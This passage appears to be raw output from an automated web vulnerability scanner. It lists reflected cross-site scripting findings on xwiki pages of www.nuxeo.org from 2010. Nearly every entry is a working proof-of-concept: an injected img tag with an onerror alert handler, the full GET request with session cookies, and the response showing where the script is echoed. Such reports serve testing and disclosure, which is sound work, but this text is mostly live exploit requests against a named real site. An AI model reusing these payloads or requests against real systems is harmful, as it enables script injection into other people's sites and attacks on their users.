HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:35:59 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12921 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/AllDocse77a3%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5736c0fdff5?format=xar&name=Main.AllDocse77a3"><img src=a onerror=alert(1)>5736c0fdff5&pages=Main.AllDocse77a3"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482 was submitted in the REST URL parameter 4. This input was echoed as a6af0<img src=a onerror=alert(1)>9ae92ff6482 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maina6af0<img%20src%3da%20onerror%3dalert(1)>9ae92ff6482/BlogRss HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:20 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12871 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Maina6af0%3Cimg+src%3Da+onerror%3Dalert%281%29%3E9ae92ff6482/">Maina6af0<img src=a onerror=alert(1)>9ae92ff6482</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc was submitted in the REST URL parameter 4. This input was echoed as b9d0b"><img src=a onerror=alert(1)>f559c3eb1fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Mainb9d0b"><img%20src%3da%20onerror%3dalert(1)>f559c3eb1fc/BlogRss HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:12:45 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12937 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Mainb9d0b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef559c3eb1fc/BlogRss?format=xar&name=Mainb9d0b"><img src=a onerror=alert(1)>f559c3eb1fc.BlogRss&pages=Mainb9d0b"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 was submitted in the REST URL parameter 5. This input was echoed as b0ae0"><img src=a onerror=alert(1)>7936f7b7411 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/BlogRssb0ae0"><img%20src%3da%20onerror%3dalert(1)>7936f7b7411 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:01 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12921 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/BlogRssb0ae0%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7936f7b7411?format=xar&name=Main.BlogRssb0ae0"><img src=a onerror=alert(1)>7936f7b7411&pages=Main.BlogRssb0ae0"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 was submitted in the REST URL parameter 5. This input was echoed as f4e8d<img src=a onerror=alert(1)>30d9f92f005 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/BlogRssf4e8d<img%20src%3da%20onerror%3dalert(1)>30d9f92f005 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:57 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12859 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/BlogRssf4e8d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E30d9f92f005'>BlogRssf4e8d<img src=a onerror=alert(1)>30d9f92f005</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685 was submitted in the REST URL parameter 4. This input was echoed as 4d9ef<img src=a onerror=alert(1)>5eb223d685 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main4d9ef<img%20src%3da%20onerror%3dalert(1)>5eb223d685/BookAdminMoved HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:02 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12949 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main4d9ef%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5eb223d685/">Main4d9ef<img src=a onerror=alert(1)>5eb223d685</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b was submitted in the REST URL parameter 4. This input was echoed as d1d8b"><img src=a onerror=alert(1)>619a28fe25b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maind1d8b"><img%20src%3da%20onerror%3dalert(1)>619a28fe25b/BookAdminMoved HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:06 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13028 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Maind1d8b%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E619a28fe25b/BookAdminMoved?format=xar&name=Maind1d8b"><img src=a onerror=alert(1)>619a28fe25b.BookAdminMoved&pages=Maind1d8b"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f was submitted in the REST URL parameter 5. This input was echoed as b693d<img src=a onerror=alert(1)>f1870ce447f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/BookAdminMovedb693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:19 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12950 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMovedb693d%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1870ce447f'>BookAdminMovedb693d<img src=a onerror=alert(1)>f1870ce447f</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 was submitted in the REST URL parameter 5. This input was echoed as cfca7"><img src=a onerror=alert(1)>92f1ed54814 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/BookAdminMovedcfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:33 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 13012 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookAdminMovedcfca7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E92f1ed54814?format=xar&name=Main.BookAdminMovedcfca7"><img src=a onerror=alert(1)>92f1ed54814&pages=Main.BookAdminMovedcfca7"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755 was submitted in the REST URL parameter 4. This input was echoed as e8b6e"><img src=a onerror=alert(1)>7640e37c755 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Maine8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755/BookEPMoved HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:13:28 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12989 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Maine8b6e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7640e37c755/BookEPMoved?format=xar&name=Maine8b6e"><img src=a onerror=alert(1)>7640e37c755.BookEPMoved&pages=Maine8b6e"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2 was submitted in the REST URL parameter 4. This input was echoed as 94b55<img src=a onerror=alert(1)>bdb277e3df2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2/BookEPMoved HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:14:20 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12923 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main94b55%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebdb277e3df2/">Main94b55<img src=a onerror=alert(1)>bdb277e3df2</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 was submitted in the REST URL parameter 5. This input was echoed as a5c7c<img src=a onerror=alert(1)>66b831a0a72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/BookEPMoveda5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:58 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12911 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoveda5c7c%3Cimg+src%3Da+onerror%3Dalert%281%29%3E66b831a0a72'>BookEPMoveda5c7c<img src=a onerror=alert(1)>66b831a0a72</a> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b was submitted in the REST URL parameter 5. This input was echoed as 53fbe"><img src=a onerror=alert(1)>e2db809e87b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main/BookEPMoved53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:08 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12973 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookEPMoved53fbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee2db809e87b?format=xar&name=Main.BookEPMoved53fbe"><img src=a onerror=alert(1)>e2db809e87b&pages=Main.BookEPMoved53fbe"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f was submitted in the REST URL parameter 4. This input was echoed as 9ac20<img src=a onerror=alert(1)>34b3d0cb59f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f/CMIS HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:16:51 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12832 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lan ...[SNIP]... <a href="http://www.nuxeo.org/xwiki/bin/view/Main9ac20%3Cimg+src%3Da+onerror%3Dalert%281%29%3E34b3d0cb59f/">Main9ac20<img src=a onerror=alert(1)>34b3d0cb59f</a> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb was submitted in the REST URL parameter 4. This input was echoed as 6d639"><img src=a onerror=alert(1)>4b8cf8e51bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /xwiki/bin/view/Main6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb/CMIS HTTP/1.1 Host: www.nuxeo.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 14:15:58 GMT Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 12898 Via: 1.1 doc.nuxeo.org Vary: Accept-Encoding Via: 1.1 www.nuxeo.org Connection: close
